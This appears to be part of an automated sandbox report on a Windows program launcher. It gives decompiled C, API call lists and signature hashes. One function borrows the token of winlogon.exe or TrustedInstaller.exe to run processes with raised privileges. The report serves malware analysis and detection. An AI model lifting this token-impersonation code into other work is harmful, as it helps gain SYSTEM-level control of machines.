                                                                                                                    0x0040886d
                                                                                                                    0x00408874
                                                                                                                    0x0040887b
                                                                                                                    0x00408882
                                                                                                                    0x00408889
                                                                                                                    0x00408895
                                                                                                                    0x00408897
                                                                                                                    0x00408658
                                                                                                                    0x00408658
                                                                                                                    0x0040865d
                                                                                                                    0x00408661
                                                                                                                    0x0040866a
                                                                                                                    0x00408673
                                                                                                                    0x00408678
                                                                                                                    0x00000000
                                                                                                                    0x00408678
                                                                                                                    0x00408860
                                                                                                                    0x00408695
                                                                                                                    0x00408695
                                                                                                                    0x0040869f
                                                                                                                    0x004086a2
                                                                                                                    0x004086af
                                                                                                                    0x004086a4
                                                                                                                    0x004086a7
                                                                                                                    0x004086a7
                                                                                                                    0x004086b4
                                                                                                                    0x004086bf
                                                                                                                    0x004086cb
                                                                                                                    0x004086d3
                                                                                                                    0x004086d7
                                                                                                                    0x004086db
                                                                                                                    0x004086e0
                                                                                                                    0x004086f1
                                                                                                                    0x004086f8
                                                                                                                    0x004086ff
                                                                                                                    0x00408706
                                                                                                                    0x0040870d
                                                                                                                    0x00408719
                                                                                                                    0x0040871b
                                                                                                                    0x00000000
                                                                                                                    0x0040871b
                                                                                                                    0x004085d5
                                                                                                                    0x004085da
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004085ec
                                                                                                                    0x004085ef
                                                                                                                    0x004085f6
                                                                                                                    0x004085fd
                                                                                                                    0x00408604
                                                                                                                    0x0040860b
                                                                                                                    0x00408612
                                                                                                                    0x00408616
                                                                                                                    0x00408620
                                                                                                                    0x0040862a
                                                                                                                    0x00408632
                                                                                                                    0x00408633
                                                                                                                    0x00408638
                                                                                                                    0x0040864a
                                                                                                                    0x0040864f
                                                                                                                    0x00408651
                                                                                                                    0x00000000
                                                                                                                    0x0040854f
                                                                                                                    0x0040854f
                                                                                                                    0x00408550
                                                                                                                    0x00408556
                                                                                                                    0x00408556

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                      • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                      • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                      • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                    • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                                                    • swscanf.MSVCRT ref: 00408620
                                                                                                                    • _wtoi.MSVCRT ref: 00408633
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                    • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                    • API String ID: 3933224404-3784219877
                                                                                                                    • Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                                    • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                    • Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                                    • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 81%
                                                                                                                    			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                                                    0x00401fe6
                                                                                                                    0x00401ff1
                                                                                                                    0x00401ff3
                                                                                                                    0x00401fff
                                                                                                                    0x00402002
                                                                                                                    0x004020a8
                                                                                                                    0x004020ab
                                                                                                                    0x004020f3
                                                                                                                    0x004020f6
                                                                                                                    0x00402162
                                                                                                                    0x00402165
                                                                                                                    0x004021f2
                                                                                                                    0x004021f5
                                                                                                                    0x00402235
                                                                                                                    0x00402238
                                                                                                                    0x004022be
                                                                                                                    0x0040223a
                                                                                                                    0x0040223a
                                                                                                                    0x00402240
                                                                                                                    0x0040224b
                                                                                                                    0x0040224e
                                                                                                                    0x00402251
                                                                                                                    0x00402254
                                                                                                                    0x00402259
                                                                                                                    0x0040225e
                                                                                                                    0x00402262
                                                                                                                    0x00402264
                                                                                                                    0x00402264
                                                                                                                    0x00402264
                                                                                                                    0x00402262
                                                                                                                    0x00402266
                                                                                                                    0x0040226c
                                                                                                                    0x00402271
                                                                                                                    0x00402274
                                                                                                                    0x00402276
                                                                                                                    0x0040229a
                                                                                                                    0x0040229a
                                                                                                                    0x00402278
                                                                                                                    0x00402296
                                                                                                                    0x00402296
                                                                                                                    0x0040229c
                                                                                                                    0x0040229c
                                                                                                                    0x004022c0
                                                                                                                    0x004022c2
                                                                                                                    0x004022c8
                                                                                                                    0x004022c8
                                                                                                                    0x004022c8
                                                                                                                    0x00000000
                                                                                                                    0x004022c0
                                                                                                                    0x00402201
                                                                                                                    0x00402203
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402220
                                                                                                                    0x00402225
                                                                                                                    0x00402227
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040222d
                                                                                                                    0x00000000
                                                                                                                    0x0040222d
                                                                                                                    0x00402173
                                                                                                                    0x00402179
                                                                                                                    0x0040217b
                                                                                                                    0x0040217e
                                                                                                                    0x00402183
                                                                                                                    0x00402185
                                                                                                                    0x00402188
                                                                                                                    0x0040218d
                                                                                                                    0x0040218f
                                                                                                                    0x00402192
                                                                                                                    0x004021a2
                                                                                                                    0x004021a7
                                                                                                                    0x004021a9
                                                                                                                    0x004021ac
                                                                                                                    0x004021cc
                                                                                                                    0x004021d1
                                                                                                                    0x004021d3
                                                                                                                    0x004021db
                                                                                                                    0x004021db
                                                                                                                    0x004021e1
                                                                                                                    0x004021e1
                                                                                                                    0x004021e7
                                                                                                                    0x004021e7
                                                                                                                    0x00000000
                                                                                                                    0x00402192
                                                                                                                    0x004020fe
                                                                                                                    0x00402103
                                                                                                                    0x00402105
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402111
                                                                                                                    0x00402114
                                                                                                                    0x00000000
                                                                                                                    0x00402114
                                                                                                                    0x004020ad
                                                                                                                    0x004020b4
                                                                                                                    0x004020b9
                                                                                                                    0x004020bc
                                                                                                                    0x00000000
                                                                                                                    0x004020c2
                                                                                                                    0x004020c4
                                                                                                                    0x004020ce
                                                                                                                    0x004020d0
                                                                                                                    0x004020d3
                                                                                                                    0x004020d4
                                                                                                                    0x004020d5
                                                                                                                    0x004020e6
                                                                                                                    0x004020e7
                                                                                                                    0x004020d7
                                                                                                                    0x004020d7
                                                                                                                    0x004020dd
                                                                                                                    0x004020de
                                                                                                                    0x004020df
                                                                                                                    0x004020df
                                                                                                                    0x004020ec
                                                                                                                    0x004020ef
                                                                                                                    0x00000000
                                                                                                                    0x004020ef
                                                                                                                    0x00402008
                                                                                                                    0x00402016
                                                                                                                    0x0040201d
                                                                                                                    0x0040202e
                                                                                                                    0x00402035
                                                                                                                    0x00402044
                                                                                                                    0x00402049
                                                                                                                    0x00402055
                                                                                                                    0x00402064
                                                                                                                    0x00402068
                                                                                                                    0x0040206e
                                                                                                                    0x0040208b
                                                                                                                    0x00402070
                                                                                                                    0x00402082
                                                                                                                    0x00402088
                                                                                                                    0x0040209e
                                                                                                                    0x004020a1
                                                                                                                    0x00402119
                                                                                                                    0x00402119
                                                                                                                    0x0040211b
                                                                                                                    0x0040211e
                                                                                                                    0x0040211e
                                                                                                                    0x00402149
                                                                                                                    0x00402151
                                                                                                                    0x00402151
                                                                                                                    0x00402157
                                                                                                                    0x00402157
                                                                                                                    0x004022cb
                                                                                                                    0x004022d2
                                                                                                                    0x004022d2

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040201D
                                                                                                                    • memset.MSVCRT ref: 00402035
                                                                                                                      • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                      • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                    • wcslen.MSVCRT ref: 00402050
                                                                                                                    • wcslen.MSVCRT ref: 0040205F
                                                                                                                    • wcslen.MSVCRT ref: 004020B4
                                                                                                                    • _wtoi.MSVCRT ref: 004020D7
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                    • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                    • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                      • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                      • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                      • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                      • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                      • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                      • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                      • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                      • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                      • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                      • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                      • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                      • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                      • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                    • wcschr.MSVCRT ref: 00402259
                                                                                                                    • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                    • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                    • API String ID: 3201562063-2355939583
                                                                                                                    • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                    • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                    • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                    • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(Process32NextW(_v12,  &_v1136) != 0) {
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}






























                                                                                                                    0x00409609
                                                                                                                    0x0040960f
                                                                                                                    0x00409619
                                                                                                                    0x00409623
                                                                                                                    0x0040962e
                                                                                                                    0x00409633
                                                                                                                    0x00409640
                                                                                                                    0x0040964a
                                                                                                                    0x00409782
                                                                                                                    0x0040965a
                                                                                                                    0x0040965f
                                                                                                                    0x00409678
                                                                                                                    0x0040967e
                                                                                                                    0x00409681
                                                                                                                    0x00409685
                                                                                                                    0x00409688
                                                                                                                    0x004096b2
                                                                                                                    0x004096bf
                                                                                                                    0x004096c6
                                                                                                                    0x004096cb
                                                                                                                    0x004096da
                                                                                                                    0x004096e6
                                                                                                                    0x0040973b
                                                                                                                    0x00409747
                                                                                                                    0x0040975f
                                                                                                                    0x00409764
                                                                                                                    0x0040976a
                                                                                                                    0x00409770
                                                                                                                    0x00409773
                                                                                                                    0x0040977d
                                                                                                                    0x00000000
                                                                                                                    0x0040977d
                                                                                                                    0x004096ee
                                                                                                                    0x004096f5
                                                                                                                    0x004096fc
                                                                                                                    0x00409704
                                                                                                                    0x0040970c
                                                                                                                    0x0040971c
                                                                                                                    0x0040971c
                                                                                                                    0x00409704
                                                                                                                    0x00409721
                                                                                                                    0x00409728
                                                                                                                    0x00409739
                                                                                                                    0x00409739
                                                                                                                    0x00000000
                                                                                                                    0x00409728
                                                                                                                    0x00409693
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004096a5
                                                                                                                    0x004096a9
                                                                                                                    0x004096ac
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004096ac
                                                                                                                    0x004097a6

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                    • memset.MSVCRT ref: 0040962E
                                                                                                                    • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                    • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                    • memset.MSVCRT ref: 004096C6
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                    • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                    • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                    • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                    • API String ID: 239888749-1740548384
                                                                                                                    • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                    • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                    • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                    • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                                                    0x00409924
                                                                                                                    0x0040992c
                                                                                                                    0x00409937
                                                                                                                    0x0040993f
                                                                                                                    0x0040994a
                                                                                                                    0x00409956
                                                                                                                    0x00409962
                                                                                                                    0x0040996e
                                                                                                                    0x00409971
                                                                                                                    0x00409973
                                                                                                                    0x00000000
                                                                                                                    0x00409976
                                                                                                                    0x00409977

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                      • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                    • API String ID: 1529661771-70141382
                                                                                                                    • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                    • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                    • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                    • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2827331108-0
                                                                                                                    • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                    • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                    • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
